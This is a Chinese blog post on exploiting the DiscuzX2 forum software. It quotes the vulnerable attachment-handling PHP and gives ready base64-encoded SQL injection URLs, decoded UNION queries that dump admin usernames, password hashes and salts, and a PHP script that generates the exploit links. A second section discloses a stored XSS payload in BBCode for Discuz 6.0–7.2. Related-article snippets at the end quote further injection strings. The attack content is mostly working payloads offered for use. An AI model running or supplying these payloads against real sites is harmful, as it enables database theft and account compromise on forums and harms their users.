DiscuzX2注入漏洞及XSS漏洞的利用

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量4.9k 收藏
点赞数
分类专栏: PHP 网络安全 MySQL 文章标签: table database 测试 schema 存储 module
PHP 同时被 3 个专栏收录
76 篇文章 0 订阅
订阅专栏
MySQL
17 篇文章 0 订阅
订阅专栏
网络安全
9 篇文章 0 订阅
订阅专栏

注射漏洞详细说明:

文件:source\module\forum\forum_attachment.php

if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
}

变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。


http://www.xx.com/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDS

EVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2U

gJyVfbWVtYmVyfHh8eHx4fHg%3D

转向后网址
http://www.xx.com/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where  username like ‘admin|x|y


实际查询为:

$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));

如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

=======================================================
贴个PHP的EXP:


<?php
$host=”http://www.xx.com(论坛地址)”;
$affuser=”要爆的用户名username”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));
echo ‘” target=”_blank”>爆前缀</a>’;
echo “</br>”;
echo ‘<a href=”‘;
echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
echo ‘” target=”_blank”>爆password,salt</a>’;
?>
注:即使爆出来用户名与密码,但是密码的加密方式这 MD5(MD5($pass),$salt) 类型,$salt 是 A~z 0~9 随机数值,所以也很鸡肋的,破解不了密码。。。坐等大N出GetwebShell

 

Discuz!多版本 存储型XSS脚本漏洞 (0day) 漏洞公布


  2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。
在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。
当时我们一起测试的是DZ6.0-DZ7.2,不知道是不是通杀啊。哈哈!没有一个一个去测试。有条件的去测试一下吧。


发贴进入源码模式,写入如下的exp:

[email][url][img]http://www.0517net.com οnmοuseοver=alert(/DZ-xss-0day/);[/img][/url][/email]

上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!!!

附上XSS完的源码如下:

<a href="mailto:"></a><a href="%5C%22http://www.0517net.com" οnmοuseοver="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20οnmοuseοver=alert%28/DZ-xss-0day/%29;" οnlοad="thumbImg(this)" alt=""> </a>

我想你们一看就明白了吧!

 

 

沧海一波
关注
专栏目录
Discuz x2 XSS漏洞
pygain的博客
10-31 3682
Discuz x2 cms 针对拥有编辑权限的管理员存在储存型xss,构造合理的payload可拿到管理员cookie payload: [align="onmouseover="alert(1)];
Discuz X 系列全版本 后台Sql注入漏洞
bulangman277的博客
12-28 3583
Discuz! X 系列全版本 后台Sql注入漏洞
Discuz! X2 SQL注射漏洞
weixin_33857230的博客
07-04 582
Discuz! X2 SQL注射漏洞,支持Union 文件:source\module\forum\forum_p_w_upload.php 详细: 1 2 3 4 5 6 7 8 9 ...
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1323
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
(转)Discuz! X2.0 SQL注入漏洞 EXP
weixin_34092370的博客
06-29 330
DZ2.0直接暴管理账号密码(默认前缀的情况下) /forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJv...
Discuz! X2 SQL注射漏洞 0day
fengling132的专栏
05-02 1048
@Discuz! X2 SQL注射漏洞 0day  文件:source\module\forum\forum_attachment.php   if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t
最新2011呀 Discuz! X2 SQL注射漏洞
亿光年
09-29 2432
简要描述: DiscuzX2 SQL注射漏洞,支持Union 详细说明: 文件:source\module\forum\forum_attachment.php if(!defined(‘IN_DISCUZ’)) { exit(‘Acce
PHP 小心urldecode引发的SQL注入漏洞
10-28
开发者在处理POST数据时,使用urldecode函数对数据进行了二次解码,导致编码的单引号(%27)被解码成真正的单引号('),这为攻击者利用SQL注入漏洞打开了大门。攻击者可以构造恶意的SQL语句,当这些数据被未经严格...
Discuzx2 开发标准流程笔记
09-28
2. 接下来是加载支持文件/source/function/function_core.php,这是存放所有核心函数的地方,当核心类需要实例化时,这些函数会被使用。 3. 继而加载模块所需的独立函数/source/function/function_newModule.php。...
discuzX V!微生活百搭门户2(mobanbus_vlivev2)商业版.rar
12-01
1.模板版本支持:discuzx3,包括【门户首页】、【门户文章列表】、【门户文章详情】、 【论坛首页】、【论坛列表页】、【独立瀑布流】、【论坛内容页】等页面的原创美化!! 2.模板首页、列表页、内容页、以及文章...
Discuz X 后台二次注入漏洞
weixin_43263451的博客
03-20 3037
漏洞分析 uc_client\model\base.php 37行 跟进 继续跟进,可以看到此处进行了mysql查询,此处的UC_APPID查找其来源 ctrl+左键点进去看一下 发现是在配置文件里面写着的 全局搜索一下UC_APPID 发现是这样写进去的,首先在配置文件里面查找原先的define(‘UC_APPID’, …);然后用"define(‘UC_APPID’, ‘".$settingnew[‘uc’][‘appid’]."’)"进行替换,UC_APPID的值为$settingnew[
discuz X25 某功能存在 xss漏洞以及解决方案
09-28
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
Discuz x2 source/function/function_connect.php 泄漏服
weixin_34393428的博客
12-03 121
影响版本: Discuz x2漏洞描述: source/function/function_connect.php 文件头部没有加: if(!defined(‘IN_DISCUZ’)) { exit(‘Access Denied’); } 并且在头部包函了其他文件: require_once libfile(‘functio...
Discuz x1.5 – x2版本 二次注射
收集盒 Book box
02-01 786
a’,`subject`=(/*!select*/ concat(username,’|',password,’|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=’ 再给出一些语句。 ‘,`subject`=(/*!select*/ group_concat(uid,’:') from pre_common_mem
Discuz! X系列全版本后台sql注入漏洞
weixin_53303754的博客
10-15 337
1’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1)-- a //查询数据库并得到flag。1’ and updatexml(1,concat(0x7e,(SELECT version())),1)-- a //查询当前版本。1’ and updatexml(1,concat(0x7e,(SELECT user())),1)-- a //查询当前用户。
discuz classcore.php 木马,Discuz! X2 核心类源码分析(class_core.php)
weixin_39953629的博客
04-11 263
/*** [Discuz!] (C)2001-2099 Comsenz Inc.* This is NOT a freeware, use is subject to license terms** $Id: class_core.php 21271 2011-03-22 02:44:58Z congyushuai $*/define('IN_DISCUZ', tru...
DZ x2.5 爆路径漏洞
fengling132的专栏
08-23 852
测试exp:    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myrepeats.php    http://localhost/install/include/install_lang.php
DiscuzX2核心文件详解与功能概览
DiscuzX2是一个流行的开源论坛系统,它提供了强大的社区管理和用户交互功能。为了帮助用户理解upload目录中的文件结构和作用,以下是对关键文件的详细解读: 1. **admin.php** - 系统站点管理入口文件,管理员进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值